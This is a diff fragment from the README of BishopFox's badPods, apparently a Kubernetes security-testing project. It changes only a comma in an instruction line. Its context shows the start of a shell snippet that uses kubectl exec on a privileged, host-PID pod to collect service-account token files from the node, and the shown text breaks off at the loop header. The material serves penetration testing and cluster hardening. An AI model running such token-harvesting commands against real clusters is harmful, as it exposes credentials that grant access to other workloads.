BishopFox/badPods/manifests/priv-and-hostpid/README.md

-*Run this where you have kubectl installed, and NOT from within the priv pod.*
+*Run this where you have kubectl installed and NOT from within the priv pod.*
 ```
 tokens=`kubectl exec -it priv-and-hostpid-exec-pod -- find /var/lib/kubelet/pods/ -name token -type l`; \
 for filename in $tokens; \